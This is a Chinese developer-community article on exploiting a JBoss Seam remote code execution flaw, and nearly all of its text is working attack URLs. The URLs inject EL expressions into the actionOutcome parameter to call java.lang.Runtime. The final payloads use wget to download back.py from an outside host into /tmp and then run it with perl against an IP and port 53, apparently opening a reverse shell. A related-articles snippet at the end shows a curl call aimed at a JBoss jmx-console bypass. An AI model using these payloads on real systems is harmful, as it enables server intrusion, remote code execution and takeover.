AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

jboss seam 远程执行漏洞利用步骤

2011-12-15 1004
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 目标:http://www.ip.comhttp://ip.com/welcome.seam?pwned=java.

目标:http://www.ip.com
http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478
http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23{expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[6]}

http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName

('java.lang.Runtime')}.getDeclaredMethods()[13]}

http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[6].invoke(null), 'wget http://www.bitpress.com.cn/uploads/back.py -O

/tmp/back.py')}


home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[6].invoke(null), 'perl /tmp/back.py 118.122.176.42 53')}

文章标签:
应用服务中间件
安全
Perl
关键词:
Jboss漏洞
cnbird
目录
相关文章
GG2020gg
|
2月前
|
安全 Java 应用服务中间件
渗透测试-JBoss 5.x/6.x反序列化漏洞
渗透测试-JBoss 5.x/6.x反序列化漏洞
GG2020gg
50 14
@北鲲
|
开发框架 安全 Java
JBoss中间件漏洞总结
一.Jboss简介 Jboss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 默认端口:8080
@北鲲
761 6
晚来风急
|
安全 中间件 应用服务中间件
红帽JBoss中间件漏洞爆跨站攻击漏洞 绿盟科技发布安全威胁通告
晚来风急
1349 3
技术小美
|
安全 Linux Shell
JBoss企业应用平台多个非授权访问漏洞
技术小美
1378 0
科技小能手
|
安全 测试技术 Linux
Jboss漏洞导致linux服务器中毒解决办法
科技小能手
1547 0
技术小美
|
安全 Java 应用服务中间件
jboss非授权访问漏洞
技术小美
1688 0
boxti
|
Web App开发 安全 应用服务中间件
遭JBoss漏洞破坏23000台服务器“中招
boxti
2172 0
晚来风急
|
安全 物联网 应用服务中间件
Red Hat JBoss多平台Karaf远程代码执行漏洞 CVE-2016-8648
晚来风急
1611 0
沉默术士
|
安全 应用服务中间件
JBoss漏洞易于传播勒索软件,未打补丁的系统看着办
沉默术士
1442 0
cnbird
|
安全 应用服务中间件
jboss 认证绕过漏洞利用的另外一种方式添加用户
curl -I "http://foobar:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservic...
cnbird
920 0